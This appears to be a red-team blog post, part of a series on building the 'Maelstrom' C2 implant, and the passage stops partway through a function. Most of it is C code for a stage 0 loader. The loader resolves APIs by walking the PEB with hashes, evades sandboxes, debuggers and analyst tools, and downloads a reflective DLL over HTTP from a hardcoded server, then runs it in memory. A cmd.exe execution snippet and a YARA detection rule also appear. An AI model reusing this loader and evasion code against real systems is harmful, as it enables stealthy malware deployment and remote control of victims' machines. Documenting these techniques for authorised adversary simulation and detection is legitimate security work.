Maelstrom #4: Writing a C2 Implant

In this blog, we will discuss how to write a C2 implant for the modern era. We will look at the history of offensive techniques and the progress of defence.

Introduction

In the series so far, we have discussed the purpose and intentions behind a C2, and the design considerations for both the implant and server.

In this post, we will move beyond this theoretical discussion and begin building a basic implant. We'll start by looking at the evolution of offensive and defensive techniques since 2010, to give us context and understanding of the current landscape. We'll then, as with our previous posts, discuss some important concepts that we'll be incorporating into the implant. Finally, we'll walk through the implant design, writing the base of both stage0 and stage1 of the implant for our exemplar C2, Maelstrom.

    public void ExecuteCommand(String command)
    {
       Process p = new Process();
       ProcessStartInfo startInfo = new ProcessStartInfo();
       startInfo.FileName = "cmd.exe";
       startInfo.Arguments = @"/c " + command; // cmd.exe spesific implementation
       p.StartInfo = startInfo;
       p.Start();
    }

Objectives

This post will cover:

The background and development of offensive and defensive techniques around implants.
The functions and code required for a contempory Stage 0, including:
- Environmental Keying
- Detecting Suspicious Processes
- Anti-Sandbox Protections
- Anti-Debug Protections
The functions and code required for a contemporary Stage 1, including:
- Reflective Loading
- DLL Debugging
- Server Checkins
- Sleeping

As we've mentioned in a similar paragraph in every blog post so far, and will continue mentioning in every post so far but after, the code will serve to illustrate the functionality, but is far from being immediately usable within a functional C2.

Stage 0:

Environmental Keying
Detecting Suspicious Processes
Anti-Sandbox
Anti-Debug

Stage 1:

Checking-in to the server

Evolution of Offensive and Defensive Techniques

Over the years, code execution has gotten more and more complicated as defensive techniques and processes, improved requiring more sophisticated approaches. In this section, we want to just nail down the evolution and history of both offence and defence within this space. By doing so, we hope to build an understanding of why some behaviours are absolutely necessary in today's red team environment.

While some implants may be anti-virus proof, able to run without detection and execute commands within a system, this is a far cry from being able to operate as a viable C2 within a network with an up-to-date EDR and a correctly configured SIEM. Indeed, without these actions in place, a red team is likely to not provide value to an organisation as many of the recommendations will simply be unapplicable to a network with that level of maturity.

2010s

-> implant.exe
  -> cmd.exe
    -> whoami.exe

2014 - 2016

2017 - 2019

2019 - 2020

Finally, Cobalt Strike 4.0 introduces an internal inline-execute post-exploitation pattern. Inline-execute passes a capability to Beacon as needed, executes it inline, and cleans up the capability after it ran. This post-exploitation interface paves the way for future features that execute within Beacon’s process context without bloating the agent itself.

A Beacon Object File (BOF) is a compiled C program, written to a convention that allows it to execute within a Beacon process and use internal Beacon APIs. BOFs are a way to rapidly extend the Beacon agent with new post-exploitation features.

TrustedSec then went onto produce:

Around the same time, people began reinterpreting the execute-assembly function by rewriting the CLR and executing it as a RDLL:

2022

Cobalt Strike for many years, in our experience at any rate, was the C2. Even with the growth of other C2s, Cobalt Strike remains the C2 that C2s are compared to, the Sennheiser HD600's of the offensive tools. Cobalt Strike's interface and operation (and Armitage before it) remain "what a C2 looks like", at least in our minds. Although we've not seen many imitate the device canvas (or, sadly, the lightning).

While there are arguments to be made for other projects, Cobalt Strike has been steering the industry, for both Offence and Defence, for years. The frequent and information dense blogs and videos helped both offensive and defensive teams improve their techniques in a way that few other vendors have done.

Researchers worked on "How to improve X in Cobalt Strike" for a long time, and the change to actually building new and unique tooling has only shifted over the past few years. For defensive teams, Cobalt Strike is still frequently seen and will be for a while. This comes from its leaks and cracks over the years and its continued effectiveness.

Both of these offer advanced evasive technology baked into the product, and are aimed at working in sophisticated environments with high levels of protection in place.

In the next two blogs, we will look at implementing a few of these techniques. Namely, ETWTi, Userland hooks, ETW, AMSI and memory sweeps.

Important Concepts

In this section, we want to outline a few topics that will come up when building out the implant so that they make sense and we can demonstrate the implant effectively.

OS Shell Commands

When discussing OS Shell Commands, we don't mean just cmd.exe. This is anything that causes a a child process to spawn to run the command, every language has its equivalent. To name a few:

Fundamentally Windows cannot block the features that Windows itself has to use. Since these calls are so ubiquitous, since every feature in Windows makes use of these, they are now reliant on EDR using hooks and callbacks.

WinAPI

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

For now, though, the WINAPI is giving us access to calls that will make this entire process easier.

Process Environment Block

Process Name
Location
Is it being debugged
Loaded modules
Environment Path
Etc

This is all stored in a structure like so:

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
  PVOID                         Reserved4[3];
  PVOID                         AtlThunkSListPtr;
  PVOID                         Reserved5;
  ULONG                         Reserved6;
  PVOID                         Reserved7;
  ULONG                         Reserved8;
  ULONG                         AtlThunkSListPtr32;
  PVOID                         Reserved9[45];
  BYTE                          Reserved10[96];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE                          Reserved11[128];
  PVOID                         Reserved12[1];
  ULONG                         SessionId;
} PEB, *PPEB;

Throughout this blog, we will interact with the PEB a lot, mainly to get enumerate loaded modules and such. As this is a pretty extensive topic, we won't discuss it all and have some recommended reads. But for now, know the PEB as the structure in which the process is build upon.

Position Independent Code

When we talk about Position Independent Code, we are talking about C code that is written in a very specific way, with additional restrictions. The goal is to have all the code we plan to execute inside the .text section of the PE.

Writing C normally will cause different parts of the code to be stored in different sections:

Global Variables in .bss
Imported DLLs in .idata
Exports in .data
CHAR* and WCHAR* in .rdata

Even with all those limitations, we can still achieve our goal. We just need to write code in a very specific way to avoid these different section allocations. By doing so, we ensure all the code is in the .text section. We need this because that is the section required for storing all of the binary code. If part of the code is in .bss, then it will crash because we're only going to extract the .text.

For example, lets assume this string:

const char* String = "hello world";

Because this is read-only initialised data, it goes into .rdata. To get this to be PIC, we write it as such:

char String[] = {'a', 'b', 'c', 0};

What if we want to use VirtualAlloc? If its just called as is, then it will have Kernel32 as an import. To get around this, we will need to dynamically load the DLL, and then resolve the address (more on this later).

One final note, to ensure we don't have CRT controlling the execution flow of the PE, we need to make sure that the entry-point is not main or some other form of winmain, wmain, etc. We will show this later on in the Makefile.

Supporting Post Exploitation

When discussing implants, there are several methods of supporting post explotation utilities. For the most part, implants will have a majority of their functionality embedded in the implant. So, when the implant recieves a command, the command will go through some sort of switch statement:

switch(job):
    case 1:
        whoami();
        break;
    case 2:
        hostname();
        break;

Alternatively, the implant could work as a loader; supporting:

This ensures that the actual implant is significantly smaller, and all functionality is modular. However, this comes at the cost of constant memory allocations for each job. The method chosen is entirely defendant on the use case, but we should it will be addressed. For us, we will stick the the traditional all functionality embedded variant.

Types of implants

Position Independent

// Copy the shellcode into it.
memcpy( pBuffer, shellcode_bin, shellcode_bin_len );

// Make a function pointer to the run function shellcode.
fprun Run = ( fprun )pBuffer;

Dynamic Link Library

HMODULE hModule = LoadLibraryA("c:\\implant.dll");

The issue here is that LoadLibraryA requires the DLL to be on disk which would break the golden rule of OpSec: Don't write to disk. Doing so will leave artifacts behind, allowing for the implant to be signatured, resulting in more time on trying to break the signature.

The Golden Rule of OpSec: Don't write to disk!*
* Unless you need to, or unless you know how to avoid the detection, or... except... and... ... other caveats

Reflective DLLs

Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.

Essentially whats going to happen is the RDLL will be allocated similarly to typical shellcode:

Once the exported address has been found, the offset is added to the base address of the allocated space for the RDLL. Like so:

LPVOID lpBuffer = NULL /* This will be the buffer containing the RDLL */;
DWORD dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
LPVOID lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); 
LPVOID lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );

First off, lpBuffer can be from anywhere; downloaded from the internet, read from a file, etc. For an implant, its likely downloaded over some sort of channel (HTTP).
With the buffer, it is then cycled through to find the RVA of the exported function.
Now that the offset is determined, and stored in dwReflectiveLoaderOffset, lpRemoteLibraryBuffer will be the base address returned from VirtualAllocEx.
The space is allocated, and the export offset found, they can be added together to get the address of the exported function.

All that needs to happen now is for the thread to be created at this point to execute the loader:

hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );

import "pe"
rule ReflectiveLoader
{
    meta: description = "Detects a unspecified hack tool, crack or malware using a reflective loader  no hard match  further investigation recommended"
    reference = "Internal Research"
    score = 60
    strings:
        $s1 = "ReflectiveLoader" fullword ascii
        $s2 = "ReflectivLoader.dll" fullword ascii
        $s3 = "?ReflectiveLoader@@" ascii
    condition:
    uint16(0) == 0x5a4d and ( 1 of them or pe.exports("ReflectiveLoader") or pe.exports("_ReflectiveLoader@4") or pe.exports("?ReflectiveLoader@@YGKPAX@Z") )
}

This is the technique we will follow for Maelstrom.

Recap of the Execution Flow

Stage 0: A Position Independent Loader
Stage 1: Reflective DLL

By making the stage 0 loader PIC, we can wrap it into any other form of loader required. Once the Stage 0 executes, it will load a Reflective DLL which will be the main implant (Stage 1).

Simple.

Stage 0

Maelstrom WinAPI Resolution

FARPROC GetSymbolAddress(HANDLE hModule, LPCSTR lpProcName) {
    UINT64 uiModuleAddress = (UINT64)hModule;
    UINT64 uiSymbolAddress = 0;
    UINT64 uiExportedAddressTable = 0;
    UINT64 uiNamePointerTable = 0;
    UINT64 uiOrdinalTable = 0;

    if (hModule == NULL) {
        return 0;
    }

    PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)(uiModuleAddress + ((PIMAGE_DOS_HEADER)uiModuleAddress)->e_lfanew);
    PIMAGE_DATA_DIRECTORY DataDir = (PIMAGE_DATA_DIRECTORY)&NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    PIMAGE_EXPORT_DIRECTORY ExportDir = (PIMAGE_EXPORT_DIRECTORY)(uiModuleAddress + DataDir->VirtualAddress);

    uiExportedAddressTable = (uiModuleAddress + ExportDir->AddressOfFunctions);
    uiNamePointerTable = (uiModuleAddress + ExportDir->AddressOfNames);
    uiOrdinalTable = (uiModuleAddress + ExportDir->AddressOfNameOrdinals);

    if (((UINT64)lpProcName & 0xFFFF0000) == 0x00000000) {
        uiExportedAddressTable += ((IMAGE_ORDINAL((UINT64)lpProcName) - ExportDir->Base) * sizeof(DWORD));
        uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
    }
    else {
        DWORD dwCounter = ExportDir->NumberOfNames;
        while (dwCounter--) {
            char* cpExportedFunctionName = (char*)(uiModuleAddress + DEREF_32(uiNamePointerTable));
            if (Strcmp(cpExportedFunctionName, lpProcName) == 0) {
                uiExportedAddressTable += (DEREF_16(uiOrdinalTable) * sizeof(DWORD));
                uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
                break;
            }
            uiNamePointerTable += sizeof(DWORD);
            uiOrdinalTable += sizeof(WORD);
        }
    }

    return (FARPROC)uiSymbolAddress;
}

First, pass in a module base address and cast it to uiModuleAddress:

UINT64 uiModuleAddress = (UINT64)hModule;

This is the used to identify the Export Directory, again, this is a standard technique:

PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)(uiModuleAddress + ((PIMAGE_DOS_HEADER)uiModuleAddress)->e_lfanew);
PIMAGE_DATA_DIRECTORY DataDir = (PIMAGE_DATA_DIRECTORY)&NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
PIMAGE_EXPORT_DIRECTORY ExportDir = (PIMAGE_EXPORT_DIRECTORY)(uiModuleAddress + DataDir->VirtualAddress);

Get the offset of the NT Headers by adding the base address and offsetting it with the DOS Headers to give the e_lfanew. Then, using that value, extract the Data Directory struct. Finally, specifically get the Export Directory by offsetting the module base with the data directories virtual address. Now access to the Export Directory has been achieved.

Now it is just a case of looping through all the exported functions from that directory until the strings match:

DWORD dwCounter = ExportDir->NumberOfNames;
while (dwCounter--) {
    char* cpExportedFunctionName = (char*)(uiModuleAddress + DEREF_32(uiNamePointerTable));
    if (Strcmp(cpExportedFunctionName, lpProcName) == 0) {
        uiExportedAddressTable += (DEREF_16(uiOrdinalTable) * sizeof(DWORD));
        uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
        break;
    }
    uiNamePointerTable += sizeof(DWORD);
    uiOrdinalTable += sizeof(WORD);
}

int STRCMP(const char* p1, const char* p2)
{
    const unsigned char* s1 = (const unsigned char*)p1;
    const unsigned char* s2 = (const unsigned char*)p2;
    unsigned char c1, c2;
    do
    {
        c1 = (unsigned char)*s1++;
        c2 = (unsigned char)*s2++;
        if (c1 == '\0')
            return c1 - c2;
    } while (c1 == c2);
    return c1 - c2;
}

void* MEMSET2(void* dest, int val, size_t len)
{
    unsigned char* ptr = dest;
    while (len-- > 0)
        *ptr++ = val;
    return dest;
}

When STRCMP matches, we return the symbolAddress after the break:

return (FARPROC)uiSymbolAddress;

So where is the module base address coming from? Well:

LPVOID GetKernel32() {
    LPVOID pKernel32Dll = NULL;
    pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH1);
    if (NULL == pKernel32Dll) {
        pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH2);
        if (NULL == pKernel32Dll) {
            pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH3);
            if (NULL == pKernel32Dll) {
                return NULL;
            }
        }
    }
    return pKernel32Dll;
}

Three DJB2 hashes are defined:

#define KERNEL32DLL_HASH1   0xa709e74f /// Hash of KERNEL32.DLL
#define KERNEL32DLL_HASH2   0xa96f406f /// Hash of kernel32.dll
#define KERNEL32DLL_HASH3   0x8b03944f /// Hash of Kernel32.dll

Then, parsing the PEB we can obtain the DLLBase:

LPVOID GetModuleByHash(UINT uiModuleHash) {
    PEB* peb = (PEB*)PPEB_PTR;
    if (NULL == peb) {
        return NULL;
    }

    PEB_LDR_DATA* pLdr = peb->Ldr;
    LIST_ENTRY* pListHead = &(pLdr->InMemoryOrderModuleList);
    LIST_ENTRY* pListEntry = NULL;
    LDR_DATA_TABLE_ENTRY_COMPLETED* pLdrEntry;

    for (pListEntry = pListHead->Flink; pListEntry != pListHead; pListEntry = pListEntry->Flink) {
        pLdrEntry = (LDR_DATA_TABLE_ENTRY_COMPLETED*)((PCHAR)pListEntry - sizeof(LIST_ENTRY));
        WCHAR* pwDllName = pLdrEntry->BaseDllName.Buffer;
        UINT wHash = Djb2HashW(pwDllName);
        if (wHash == uiModuleHash) {
            return pLdrEntry->DllBase;
        }
    }
    return NULL;
}

First off, get the PEB Struct:

PEB* peb = (PEB*)PPEB_PTR;

Where PPEB_PTR is:

#define PPEB_PTR __readgsqword(0x60)

PEB_LDR_DATA* pLdr = peb->Ldr;

Then get access to the module list:

LIST_ENTRY* pListHead = &(pLdr->InMemoryOrderModuleList);
LIST_ENTRY* pListEntry = NULL;
LDR_DATA_TABLE_ENTRY_COMPLETED* pLdrEntry;

As seen in the struct:

typedef struct _PEB_LDR_DATA {
  BYTE       Reserved1[8];
  PVOID      Reserved2[3];
  LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

Then loop over it until the hashes match. When they do, that will be the DLL required.

Now its a case of casting to the function type, but before that; here is how the APIs are stored:

typedef struct API_ {
    LPVOID LoadLibraryA;
    LPVOID CloseHandle;
    LPVOID GlobalMemoryStatusEx;
    LPVOID CreateToolhelp32Snapshot;
    LPVOID Process32NextW;
    LPVOID Process32FirstW;
    LPVOID GetComputerNameW;
    LPVOID Sleep;
    LPVOID WinHttpCloseHandle;
    LPVOID WinHttpQueryDataAvailable;
    LPVOID WinHttpQueryHeaders;
    LPVOID WinHttpReadData;
    LPVOID WinHttpReceiveResponse;
    LPVOID WinHttpSendRequest;
    LPVOID WinHttpSetOption;
    LPVOID WinHttpConnect;
    LPVOID WinHttpOpen;
    LPVOID WinHttpOpenRequest;
    LPVOID WinHttpAddRequestHeaders;
    LPVOID GlobalFree;
    LPVOID malloc;
    LPVOID free;
    LPVOID memset;
    LPVOID VirtualProtect;
    LPVOID VirtualAlloc;
    LPVOID CreateThread;
    LPVOID WaitForSingleObject;
    LPVOID VirtualFree;
}
API, * PAPI;

In the case of LoadLibraryA:

typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR lpLibFileName);
CHAR cLoadLibraryA[13] = { 'L', 'o', 'a', 'd','L','i','b','r','a','r','y','A',0 };
Api->LoadLibraryA = GetSymbolAddress(hKernel32, cLoadLibraryA);

Then using it:

CHAR cWinHTTP[8] = { 'w','i','n','h','t','t','p',0 };
HMODULE hWinHttp = ((LOADLIBRARYA)api.LoadLibraryA)(cWinHTTP);

Now onto the stager!

Quick recap of Stage 0. Before running malicious code on a host to get an implant, some initial enumeration and checks are going to be put into place. For an Adversary Simulation exercise, this keeps the attackers within scope, whilst also ensuring that the implant is only executed when it is safe to do so.

Additionally, this entry point will all be Position Independent; meaning that all of the code will be within the .text section, allowing for the opcodes to be extracted, thus giving shellcode to execute in other methods.

Functionality

In this section, we want to discuss some functionality that can be added to a stage 0. Obviously, it doesn't need to ALL go in, but its just some things we found interesting and/or useful.

Environmental Keying

If the Environmental information embedded in the stager does not match what was enumerated, then return.
Encrypt the stage 1 DLL with some information obtained from the environment, and decrypt it at runtime.

The second point can be completely automated, this is not something done in Maelstrom, but it easy to send some information back to the C2, and then encrypt the DLL with that information before returning it to the stager.

As far as methods of doing this, there are a ton and quite frankly its down to creativity. A few examples can be shown here:

In the case of Maelstrom, we simply hash the computername and check it with this function:

BOOL IsCorrectEnvironment(API api) {
    WCHAR wHostname[MAX_COMPUTERNAME_LENGTH];
    DWORD dwSz = sizeof wHostname;

    if (((GETCOMPUTERNAMEW)api.GetComputerNameW)(wHostname, &dwSz)) {
        if (Djb2HashW(wHostname) == HOSTNAME_HASH) {
            return TRUE;
        }
    }
    return FALSE;
}

Which is called like so:

if (IsCorrectEnvironment(Api) == FALSE) {
    return FALSE;
}

So, back to the keying. If the computername doesnt match, then it returns -1 and will exit. Otherwise, it moves on.

Detecting Suspicious Processes

This is a fun one, it adds an extra layer of hindering blue teams. Its quite simple, if a process is found, exit. In the following example only one process is being checked for, but its not an extra issue to loop over a bunch:

BOOL AreSuspiciousProcessesRunning(API Api) {
    HANDLE hSnapshot;
    PROCESSENTRY32W pe32;

    hSnapshot = ((CREATETOOLHELP32SNAPSHOT)Api.CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32W);

    if (!((PROCESS32FIRSTW)Api.Process32FirstW)(hSnapshot, &pe32)) return FALSE;

    do {
        if (Djb2HashW(pe32.szExeFile) == PROCESS_HACKER_HASH) {
            return TRUE;
        }
    } while (((PROCESS32NEXTW)Api.Process32NextW)(hSnapshot, &pe32));

    ((CLOSEHANDLE)Api.CloseHandle)(hSnapshot);
    return FALSE;
}

Loop over all processes, if the hashed value of process is the same as the one defined, then return TRUE. In this case, it is Process Hacker.exe:

#define PROCESS_HACKER_HASH 0xda24bd3c

This is executed like so:

if (AreSuspiciousProcessesRunning(Api)) {
    return FALSE;
}

Anti-Sandbox

Sandboxes are a great way to automate and identify what the purpose of malware is. Essentially, they run malware inside an isolated virtual machine, watch its behaviour, report on it.

Commonly, these are small virtual machines with a limited amount of time they can wait. Some common solutions to handling sandboxes:

Waiting for the expiration time (usually 180 seconds)
Only executing if not in a virtual machine
Only executing if a disk size is above a certain threshold

They are just a few to consider, in the case of maelstrom we simply check RAM size > 4:

BOOL IsInSandbox(API Api) {
    MEMORYSTATUSEX memStatus;

    memStatus.dwLength = sizeof(memStatus);

    ((GLOBALMEMORYSTATUSEX)Api.GlobalMemoryStatusEx)(&memStatus);
    float fSz = (float)memStatus.ullTotalPhys / (1024 * 1024 * 1024);
    if (fSz > 4) {
        return FALSE;
    }
    return TRUE;
}

If this function is true, then we continue.

Combined with a sleep:

void InternalSleep(API Api, DWORD DwSleep) {
    ((SLEEP)Api.Sleep)(DwSleep);
}

Anti-Debug

BOOL IsBeingDebugged() {
    PPEB pPeb = (PPEB)PPEB_PTR;

    if (pPeb->BeingDebugged == 1) {
        return TRUE;
    }
    else {
        return FALSE;
    }
}

These techniques are useful at hindering the blue teams if the payload is retrieved; it will slow them down from identifying the purpose of the malware, as well as furthering identifying the server. This should not be the only method of doing this. For example, if it is debugged and the IPs of the server are found, then there should be server side protections to control which implants are allowed to communicate with the server.

Downloading the Reflective DLL

typedef struct DLL_ {
    LPVOID Buffer;
    DWORD Size;
}
DLL, * PDLL;

And then passed into the function:

BOOL GetReflectiveDLL(API api, PDLL Dll)

We'll get to that shortly. But first, the config of the request is defined:

WCHAR wVerb[4] = {
  'G', 'E', 'T', 0
};

WCHAR wEndpoint[9] = {
  '/', 'a', '?', 's', 't', 'a', 'g', 'e', 0
};

WCHAR wUserAgent[10] = {
  'M', 'a', 'e', 'l', 's', 't', 'r', 'o', 'm', 0
};

WCHAR wVersion[5] = {
  'H', 'T', 'T', 'P', 0
};

WCHAR wServer[13] = {
  '1', '0', '.', '1', '0', '.', '1', '1', '.', '2', '0', '5', 0
};

WCHAR wReferer[19] = {
  'h', 't', 't', 'p', 's', ':', '/', '/', 'g', 'o', 'o', 'g', 'l', 'e', '.', 'c', 'o', 'm', 0
};

WCHAR wHeaders[22] = {
  'X', '-', 'M', 'a', 'e', 'l', 's', 't', 'r', 'o', 'm', ':', ' ', 'p', 'a', 's', 's', 'w', 'o', 'r', 'd', 0
};

These strings are hard-coded in the function has does not support any sort of update. Also, the password in which the server is requiring is hardcoded in the header. Finally, these strings are in the array format so that they are placed within the .text section.

We now create a few variables, including the port:

DWORD dwPort = 5555;
BOOL bSSL = FALSE;
BOOL bProxy = FALSE;

DWORD dwSz = 0;
DWORD dwDownloaded = 0;
DWORD dwTotalRead = 0;
long lpBuffer = -1;
DWORD lpdwBufferLength = sizeof(lpBuffer);
BOOL bSetOptions = FALSE;

DWORD dwFlagsWinHttpOpenRequest = 0;
DWORD dwAllowBadCerts = 0;

HINTERNET hSession = NULL;
HINTERNET hConnect = NULL;
HINTERNET hRequest = NULL;
BOOL bSentRequest = FALSE;
BOOL bReceieveRequest = FALSE;
BOOL bHeadersQueried = FALSE;
BOOL bHeadersAdded = FALSE;
WINHTTP_AUTOPROXY_OPTIONS autoProxyOptions;
WINHTTP_PROXY_INFO proxyInfo;
DWORD dwProxyInfoSz = sizeof(proxyInfo);

We aren't going to step through the code, but there are a few things to point out.

If its SSL, set these flags:

if (bSSL) {
    dwFlagsWinHttpOpenRequest = WINHTTP_FLAG_SECURE;
    dwAllowBadCerts = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;
}

And:

if (bSSL) {
    bSetOptions = ((WINHTTPSETOPTION)api.WinHttpSetOption)(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &dwAllowBadCerts, sizeof(dwAllowBadCerts));
    if (bSetOptions == FALSE) {
        return FALSE;
    }
}

Then, this is how headers are added:

bHeadersAdded = ((WINHTTPADDREQUESTHEADERS)api.WinHttpAddRequestHeaders)(hRequest, (LPCWSTR)&wHeaders, (DWORD)-1, WINHTTP_ADDREQ_FLAG_REPLACE | WINHTTP_ADDREQ_FLAG_ADD);
if (bHeadersAdded == FALSE) {
    return FALSE;
}

If multiple headers are required, then the WCHAR needs to have them in the same string and containing the \r as per the RFC.

After the request is done, we fill the structure:

Dll->Buffer = Buffer;
Dll->Size = dwTotalRead;

if (Dll->Size > 0) {
    return TRUE;
}
else {
    return FALSE;
}

The entire process is encapsulated in the following request:

if (GetReflectiveDLL(Api, &Dll) == FALSE) {
    return -1;
}

In the stage 1 section we will discuss why a Reflective DLL was chosen and what it is, but for now lets discuss how it will be loaded. For reference, here is the code used to execute the DLL:

int LoadReflectiveDll(API Api, DLL Dll) {
    LPVOID pAddress = NULL;
    DWORD lpflOldProtect = 0;
    BOOL bProtect = FALSE;
    DWORD dwLdrOffset = 0;
    PTHREAD_START_ROUTINE pRoutine = NULL;
    HANDLE hThread = NULL;

    pAddress = ((VIRTUALALLOC)Api.VirtualAlloc)(0, Dll.Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (pAddress == NULL) {
        return 1;
    }

    Memcpy(pAddress, Dll.Buffer, Dll.Size);

    bProtect = ((VIRTUALPROTECT)Api.VirtualProtect)(pAddress, Dll.Size, PAGE_EXECUTE_READ, &lpflOldProtect);
    if (bProtect == FALSE) {
        return 1;
    }

    dwLdrOffset = GetReflectiveLoaderOffset(Dll.Buffer);
    if (dwLdrOffset == 0) {
        return 1;
    }

    pRoutine = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

    hThread = ((CREATETHREAD)Api.CreateThread)(NULL, 0, pRoutine, NULL, 0, NULL);
    if (hThread == NULL) {
        return 1;
    }
    ((WAITFORSINGLEOBJECT)Api.WaitForSingleObject)(hThread, INFINITE);

    ((VIRTUALFREE)Api.VirtualFree)(pAddress, 0, MEM_RELEASE);
    return 0;
}

void * Memcpy (void *dest, const void *src, size_t len)
{
  char *d = dest;
  const char *s = src;
  while (len--)
    *d++ = *s++;
  return dest;
}

We discussed this earlier on, but lets revisit. We first need to identify the offset of the export function so we can get the proper address to start a thread on the function:

dwLdrOffset = GetReflectiveLoaderOffset(Dll.Buffer);
if (dwLdrOffset == 0) {
    return 1;
}

pRoutine = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

Lets go over the GetReflectiveLoaderOffset() function.

The function is declared like so:

DWORD GetReflectiveLoaderOffset(VOID* lpReflectiveDllBuffer)

The parameter taken in here is the unsigned char* buffer containing the DLL retrieved from the server.

First things first, define the exported function name:

CHAR cReflectiveLoader[17] = {
    'R', 'e', 'f', 'l', 'e', 'c', 't', 'i', 'v', 'e', 'L', 'o', 'a', 'd', 'e', 'r', 0
};

uExportDirectory = uBase + ((PIMAGE_DOS_HEADER)uBase)->e_lfanew;

The struct:

typedef struct _IMAGE_DOS_HEADER
{
     WORD e_magic;
     WORD e_cblp;
     WORD e_cp;
     WORD e_crlc;
     WORD e_cparhdr;
     WORD e_minalloc;
     WORD e_maxalloc;
     WORD e_ss;
     WORD e_sp;
     WORD e_csum;
     WORD e_ip;
     WORD e_cs;
     WORD e_lfarlc;
     WORD e_ovno;
     WORD e_res[4];
     WORD e_oemid;
     WORD e_oeminfo;
     WORD e_res2[10];
     LONG e_lfanew;
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

if (((PIMAGE_NT_HEADERS)uExportDirectory)->OptionalHeader.Magic == 0x010B) // PE32
{
    if (dwCompiledArch != 1)
        return 0;
}
else if (((PIMAGE_NT_HEADERS)uExportDirectory)->OptionalHeader.Magic == 0x020B) // PE64
{
    if (dwCompiledArch != 2)
        return 0;
}
else
{
    return 0;
}

The struct:

typedef struct _IMAGE_NT_HEADERS64 {
  DWORD                   Signature;
  IMAGE_FILE_HEADER       FileHeader;
  IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

Extract the export directory, the virtual addresses, and so on:

uEntryExport = (UINT_PTR) & ((PIMAGE_NT_HEADERS)uExportDirectory)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
uExportDirectory = uBase + Rva2Offset(((PIMAGE_DATA_DIRECTORY)uEntryExport)->VirtualAddress, uBase);
uEntryExport = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfNames, uBase);
uAddress = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfFunctions, uBase);
uOrdinals = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfNameOrdinals, uBase);
dwNumberOfNames = ((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->NumberOfNames;

And then loop over all the exported function names by casting the RVA to an offset:

char* exportedFunction = (char*)(uBase + Rva2Offset(DEREF_32(uEntryExport), uBase));

Where RVA2offset() is:

DWORD Rva2Offset(DWORD dwRva, UINT_PTR uiBaseAddress)
{
    WORD wIndex = 0;
    PIMAGE_SECTION_HEADER pSectionHeader = NULL;
    PIMAGE_NT_HEADERS pNtHeaders = NULL;

    pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);

    pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);

    if (dwRva < pSectionHeader[0].PointerToRawData)
        return dwRva;

    for (wIndex = 0; wIndex < pNtHeaders->FileHeader.NumberOfSections; wIndex++)
    {
        if (dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData))
            return (dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData);
    }

    return 0;
}

if (STRSTR(exportedFunction, cReflectiveLoader) != NULL)
{
    uAddress = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfFunctions, uBase);
